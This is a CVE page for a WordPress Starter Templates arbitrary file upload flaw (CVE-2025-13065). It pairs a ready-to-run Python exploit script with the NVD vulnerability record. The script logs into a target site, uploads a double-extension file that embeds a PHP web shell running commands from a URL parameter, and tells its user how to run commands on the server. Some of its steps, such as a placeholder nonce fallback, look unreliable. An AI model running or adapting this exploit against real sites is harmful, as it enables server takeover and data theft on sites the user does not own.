CVE-2025-13065

#!/usr/bin/env python3 """ CVE-2025-13065 PoC - WordPress Starter Templates Arbitrary File Upload Author: Security Researcher Note: This PoC is for educational and authorized testing purposes only. """ import requests import sys import re def create_malicious_file(): """ Create a malicious WXR file with PHP code The file will have double extension to bypass validation """ php_code = '''<?php // Malicious PHP shell for RCE if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>''' # Create file with double extension to bypass .wxr check filename = "malicious.php.jpg" # WXR file content with embedded PHP wxr_content = f'''<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:wp="http://wordpress.org/export/1.2/"> <channel> <title>Malicious Import</title> <item> <content:encoded><![CDATA[{php_code}]]></content:encoded> </item> </channel> </rss>''' return filename, wxr_content.encode() def exploit(target_url, username, password): """ Exploit the arbitrary file upload vulnerability """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print("[*] Attempting to login to WordPress...") response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies) and 'invalid' in response.text.lower(): print("[-] Login failed! Please check credentials.") return False print("[+] Login successful!") # Step 2: Get nonce for importer nonce_url = f"{target_url}/wp-admin/admin.php?page=starter-templates" response = session.get(nonce_url) # Extract nonce (simplified) nonce_match = re.search(r'name="_wpnonce" value="([a-z0-9]+)"', response.text) if not nonce_match: print("[-] Could not find nonce, trying alternative method...") nonce = "fallback_nonce" else: nonce = nonce_match.group(1) # Step 3: Upload malicious file upload_url = f"{target_url}/wp-admin/admin-ajax.php" filename, file_content = create_malicious_file() files = { 'file': (filename, file_content, 'application/octet-stream') } data = { 'action': 'st_import_site', '_wpnonce': nonce, 'starter-templates-import': '1' } print(f"[*] Uploading malicious file: {filename}") response = session.post(upload_url, data=data, files=files) if response.status_code == 200: print("[+] File upload request sent!") print(f"[*] Check {target_url}/wp-content/uploads/ for the uploaded file") print("[*] Access the file directly to execute commands: ?cmd=whoami") return True print("[-] Upload failed!") return False if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve-2025-13065.py <target_url> <username> <password>") print("Example: python cve-2025-13065.py http://target.com admin password") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit(target, user, pwd)

{"cve": {"id": "CVE-2025-13065", "sourceIdentifier": "[email protected]", "published": "2025-12-06T10:16:05.090", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Starter Templates plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 4.4.41. This is due to insufficient file type validation detecting WXR files, allowing double extension files to bypass sanitization while being accepted as a valid WXR file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3395498/astra-sites/tags/4.4.42/inc/lib/starter-templates-importer/importer/wxr-importer/st-wxr-importer.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/439e4c99-8f34-4e66-9d86-c0cbb8cf6da0?source=cve", "source": "[email protected]"}]}}